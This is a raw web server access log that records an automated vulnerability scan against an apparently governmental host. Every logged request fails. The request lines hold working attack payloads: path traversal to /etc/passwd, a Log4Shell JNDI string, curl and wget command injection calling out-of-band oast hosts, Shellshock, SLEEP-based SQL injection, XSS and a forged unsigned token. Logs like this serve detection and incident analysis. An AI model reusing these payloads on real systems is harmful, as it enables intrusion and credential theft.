Mozilla/5.0+(Debian;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 223 2024-12-12 13:32:34 103.153.214.94 GET /feed/ShowImage.do;.js.jsp type&imgName=../../../../../../../../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 69 2024-12-12 13:32:37 103.153.214.94 POST /ajax-api/2.0/mlflow/model-versions/create - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 223 2024-12-12 13:33:13 103.153.214.94 POST /index.php - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 87 2024-12-12 13:33:13 103.153.214.94 GET /user/requireLogin - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/18.0+Safari/605.1.15 - 404 7 0 86 2024-12-12 13:33:18 103.153.214.94 POST /lcms/index.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.19041 - 404 7 0 113 2024-12-12 13:33:59 103.153.214.94 GET /login/SAML =${jndi:ldap://${:-669}${:-826}.${hostName}.username.ctcj3jjbclslbev4n7q0epd36zdsdw3nu.oast.live/tw6fR} 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11_3_7;+en)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.7+Safari/605.1.15 - 404 7 0 87 2024-12-12 13:34:04 103.153.214.94 GET /downloader.php file=%3Becho+CVE-2023-23333|rev%00.zip 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.45 - 404 7 0 215 2024-12-12 13:34:06 103.153.214.94 GET /api/auth/cognito/callback access_token=ggormksm&id_token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJjb2duaXRvOnVzZXJuYW1lIjoiZ2JvZWFyY2JsdiIsImVtYWlsIjoie3tlbWFpbH19In0=. 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.3)+AppleWebKit/616.24+(KHTML,+like+Gecko)+Version/17.2+Safari/616.24 - 404 7 0 204 2024-12-12 13:34:18 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/617.14+(KHTML,+like+Gecko)+Version/17.4.63+Safari/617.14 - 404 7 0 118 2024-12-12 13:35:48 103.153.214.94 POST /reviewInput.php pid=1 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 86 2024-12-12 13:36:31 103.153.214.94 POST /spcgi.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.2;+rv:128.0+)+Gecko/20100101+Firefox/128.0 - 404 7 0 204 2024-12-12 13:36:35 103.153.214.94 GET /index.html - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 218 2024-12-12 13:36:38 103.153.214.94 POST /ajax/api/user/save - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_17)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 241 2024-12-12 13:36:46 103.153.214.94 GET /WAN_wan.htm .gif 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/14.1.2+Safari/605.1.15 - 404 7 0 90 2024-12-12 13:36:51 103.153.214.94 GET /WAN_wan.htm .gif 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3+Safari/605.1.52 - 404 7 0 105 2024-12-12 13:38:06 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.3.26 - 404 7 0 83 2024-12-12 13:38:35 103.153.214.94 POST /service_transport/service.action - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 120 2024-12-12 13:38:35 103.153.214.94 GET /_404_><script>alert(1337)</script> - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.9.17 - 400 0 0 140 2024-12-12 13:38:36 103.153.214.94 POST /druid/indexer/v1/sampler for=connect 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/97.0.4692.71+Safari/537.36 - 404 7 0 205 2024-12-12 13:38:36 103.153.214.94 GET /forms/doLogin login_username=admin&password=password$(curl%20ctd67t3bclspkptm3qo01twuo5qygw9up.oast.fun)&x=0&y=0 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 206 2024-12-12 13:38:36 103.153.214.94 POST /api/jmeter/download/files - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 219 2024-12-12 13:38:39 103.153.214.94 GET /5rZAT.txt - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:95.0)+Gecko/20100101+Firefox/95.0 - 404 7 0 83 2024-12-12 13:38:39 103.153.214.94 GET /status><script>alert(7331)</script> - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.3.18 - 400 0 0 83 2024-12-12 13:39:03 103.153.214.94 POST /Login - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.15 https://bcvt.kontum.gov.vn:8172/login?then=/oauth/authorize?client_id=openshift-web-console&idp=basic&redirect_uri=https://bcvt.kontum.gov.vn:8172/console/oauth&response_type 404 7 0 84 2024-12-12 13:39:03 103.153.214.94 POST /opennms/j_spring_security_check - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:84.0)+Gecko/20100101+Firefox/84.0 https://bcvt.kontum.gov.vn:8172/opennms/login.jsp 404 7 0 91 2024-12-12 13:39:18 103.153.214.94 GET /index.php - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 201 2024-12-12 13:39:25 103.153.214.94 POST /boaform/admin/formTracert - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.25 https://bcvt.kontum.gov.vn:8172/diag_ping_admin_en.asp 404 7 0 90 2024-12-12 13:39:57 103.153.214.94 POST /login/userverify.cgi - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.2.22 - 404 7 0 128 2024-12-12 13:39:57 103.153.214.94 POST /cgi-bin/Maintain/date_config - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 98 2024-12-12 13:39:57 103.153.214.94 POST /app - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.21 https://bcvt.kontum.gov.vn:8172/app 404 7 0 88 2024-12-12 13:40:40 103.153.214.94 GET /hax/..CFIDE/adminapi/administrator.cfc method=getBuildNumber&_cfclient=true 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 5 0 222 2024-12-12 13:40:40 103.153.214.94 POST /cgi-bin/fax_change_faxtrace_settings - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.4.16 - 404 7 0 227 2024-12-12 13:41:14 103.153.214.94 GET /pmb/opac_css/ajax.php categ=storage&datetime=undefined&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(7)))SHde)&module=ajax&sub=save&token=undefined 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.3+Safari/605.1.15 - 404 7 0 87 2024-12-12 13:41:20 103.153.214.94 POST /WebServices/SIMMaintainService.asmx/GetAllRechargeRecordsBySIMCardId - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 84 2024-12-12 13:41:44 103.153.214.94 POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 203 2024-12-12 13:42:03 103.153.214.94 GET /geoserver/ows service=WFS&version=1.0.0&request=GetCapabilities 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 221 2024-12-12 13:42:13 103.153.214.94 GET /wp-admin/admin-ajax.php action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.7.23 - 404 7 0 210 2024-12-12 13:42:16 103.153.214.94 GET /wp-content/plugins/easy-digital-downloads/readme.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 219 2024-12-12 13:42:37 103.153.214.94 GET / rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(7)))a)--%20- 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 198 2024-12-12 13:42:41 103.153.214.94 GET /wp-content/plugins/paid-memberships-pro/js/updates.js - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 201 2024-12-12 13:45:37 103.153.214.94 POST /debug/pyspidervulntest/run - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/113.0.0.0+Safari/537.36 - 404 7 0 89 2024-12-12 13:45:59 103.153.214.94 GET /prweb/ - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 108 2024-12-12 13:47:12 103.153.214.94 GET /properties-list.php - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 92 2024-12-12 13:47:15 103.153.214.94 GET /properties-list.php property-types=%27 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 99 2024-12-12 13:47:25 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 204 2024-12-12 13:47:49 103.153.214.94 POST /admin.php p=login 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 404 7 0 86 2024-12-12 13:47:49 103.153.214.94 GET /QH.aspx responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 89 2024-12-12 13:47:50 103.153.214.94 POST /upload/UploadResourcePic.ashx ResourceID=8382 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 87 2024-12-12 13:49:12 103.153.214.94 POST /lib/crud/userprocess.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_4_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 93 2024-12-12 13:49:37 103.153.214.94 GET /product-details.php id=1%20AND%20(SELECT%206812%20FROM%20(SELECT(SLEEP(6)))DddL) 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.6.27 - 404 7 0 92 2024-12-12 13:50:09 103.153.214.94 GET /product-details.php id=1"><img/src/onerror=.1|alert`1593`+class=1593> 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 107 2024-12-12 13:50:09 103.153.214.94 POST /index.php action=login.index 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 101 2024-12-12 13:50:54 103.153.214.94 GET /index.php plot=;wget%20http://ctcj3jjbclslbev4n7q03n5yrnncjwzg8.oast.live 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.0.0+Safari/537.36 - 404 7 0 102 2024-12-12 13:50:56 103.153.214.94 POST /down.php - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 116 2024-12-12 13:50:58 103.153.214.94 POST /j_security_check - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/105.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/user/login 404 7 0 107 2024-12-12 13:51:14 103.153.214.94 POST /search.php searchtype=5 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+17_4_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.1.15 - 404 7 0 84 2024-12-12 13:51:32 103.153.214.94 POST /seeyon/main.do method=login 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 386 2024-12-12 13:51:52 103.153.214.94 GET /session/login - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 247 2024-12-12 13:52:33 103.153.214.94 POST / - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 https://bcvt.kontum.gov.vn:8172/diagnostic.html?t=201701020919 404 7 0 91 2024-12-12 13:52:36 103.153.214.94 POST /directdata/direct/router - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 7 0 86 2024-12-12 13:52:40 103.153.214.94 GET /2q3kZ6gJszFcIZ7J3UUF9fSJSsO.txt - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 90 2024-12-12 13:53:21 103.153.214.94 GET /cgi-bin/jarrewrite.sh - 8172 - 206.238.196.225 "()+{+:;+};+echo+;+/bin/bash+-c+'cat+/etc/passwd'" - 404 7 0 92 2024-12-12 13:53:24 103.153.214.94 POST /api/sonicos/auth - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.1+20.51 https://bcvt.kontum.gov.vn:8172 404 7 0 96 2024-12-12 13:54:01 103.153.214.94 POST /index.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.27 - 404 7 0 87 2024-12-12 13:54:19 103.153.214.94 POST /api/2.0/mlflow/registered-models/create - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:85.0)+Gecko/20100101+Firefox/85.0 - 404 7 0 222 2024-12-12 13:54:26 103.153.214.94 POST /api/2.0/mlflow/model-versions/create - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 260 2024-12-12 13:55:12 103.153.214.94 POST /en-US/account/login - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/111.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 134 2024-12-12 13:55:14 103.153.214.94 POST /index.php - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 79 2024-12-12 13:55:21 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 13:55:25 103.153.214.94 POST /inc/jquery/uploadify/uploadify.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 203 2024-12-12 13:57:05 103.153.214.94 GET /wp-json/wp/v2/add-listing id=1 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 201 2024-12-12 13:57:11 103.153.214.94 GET /wp-admin/profile.php - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 205 2024-12-12 13:57:35 103.153.214.94 POST /php/ping.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.2.27 - 404 7 0 103 2024-12-12 13:58:17 103.153.214.94 POST /sitemap.xml offset=1;SELECT%20IF((SLEEP(6)),1,2356) 8172 - 206.238.196.225 Mozilla/5.0+(X11;+CrOS+x86_64+14816.131.5)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/103.0.0.0+Safari/537.36 - 404 7 0 81 2024-12-12 13:58:22 103.153.214.94 POST /sitemap.xml offset=1;SELECT%20IF((SLEEP(16)),1,2356) 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 109 2024-12-12 13:59:52 103.153.214.94 POST /spre/auth/login - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 97 2024-12-12 14:00:23 103.153.214.94 GET /api/v1/users - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 199 2024-12-12 14:00:23 103.153.214.94 POST /tshirtecommerce/ajax.php type=svg 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.6.22 - 404 7 0 215 2024-12-12 14:01:58 103.153.214.94 GET /cgi-bin/DownloadCfg/RouterCfm.jpg - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 112 2024-12-12 14:01:59 103.153.214.94 POST /api/login - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.20 https://bcvt.kontum.gov.vn:8172/manage/account/login?redirect=%2Fmanage 404 7 0 69 2024-12-12 14:01:59 103.153.214.94 POST /thruk/cgi-bin/login.cgi - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.20 - 404 7 0 76 2024-12-12 14:02:32 103.153.214.94 POST /search - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:84.0)+Gecko/20100101+Firefox/84.0 - 404 7 0 77 2024-12-12 14:02:32 103.153.214.94 POST /login.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17+Safari/605.1.15 https://bcvt.kontum.gov.vn:8172/login.php 404 7 0 94 2024-12-12 14:02:34 103.153.214.94 POST /webapi/auth - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3+Safari/617.2.4.11.12 - 404 7 0 71 2024-12-12 14:02:34 103.153.214.94 GET /webapi/file/transfer name=/../../../../../../../../etc/passwd&type=db_backup 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:91.0)+Gecko/20100101+Firefox/91.0 - 404 7 0 109 2024-12-12 14:02:41 103.153.214.94 POST /index.php m=member&f=login_save 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 118 2024-12-12 14:03:03 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 202 2024-12-12 14:03:08 103.153.214.94 POST /zdm/cxf/login - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.2;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/115.0 https://bcvt.kontum.gov.vn:8172/zdm/login_xdm_uc.jsp 404 7 0 97 2024-12-12 14:04:23 103.153.214.94 POST /index.php/management/set_timezone - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/index.php/management/datetime 404 7 0 204 2024-12-12 14:04:36 103.153.214.94 POST / - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 226 2024-12-12 14:04:38 103.153.214.94 GET /spip.php page=spip_pass 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 221 2024-12-12 14:05:04 103.153.214.94 POST /api/system/ExecuteSqlForSingle - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 85 2024-12-12 14:05:04 103.153.214.94 GET /admin/File/DownloadFile filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.7.18 - 404 7 0 85 2024-12-12 14:06:05 103.153.214.94 POST /minio/bootstrap/v1/verify - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/111.0.0.0+Safari/537.36 - 404 7 0 224 2024-12-12 14:06:20 103.153.214.94 POST /3.0/authService/config - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:99.0)+Gecko/20100101+Firefox/99.0 https://bcvt.kontum.gov.vn:8172 404 7 0 94 2024-12-12 14:06:38 103.153.214.94 GET /sslvpn/sslvpn_client.php client=logoImg&img=%20/tmp|echo%20%60id%60%20|tee%20/usr/local/webui/sslvpn/roklv.txt 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 106 2024-12-12 14:06:42 103.153.214.94 GET /sslvpn/roklv.txt - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 103 2024-12-12 14:07:21 103.153.214.94 GET /service/error/sfdc_preauth.jsp session=s&userid=1&server=http://ctcj3jjbclslbev4n7q0tfga866f5kojj.oast.live%23.salesforce.com/ 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 91 2024-12-12 14:07:21 103.153.214.94 GET /mainpage/msglog.aspx user=1%27%20and%201=convert(int,(select%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27127381%27))))-- 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 90 2024-12-12 14:08:21 103.153.214.94 GET /wp-content/plugins/gift-voucher/readme.txt - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 246 2024-12-12 14:09:30 103.153.214.94 POST /zms/admin/index.php - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 https://bcvt.kontum.gov.vn:8172/zms/admin/index.php 404 7 0 123 2024-12-12 14:09:32 103.153.214.94 POST /admin - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 115 2024-12-12 14:09:37 103.153.214.94 GET /admin/dashboard.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 82 2024-12-12 14:09:48 103.153.214.94 POST /run - 8172 - 206.238.196.225 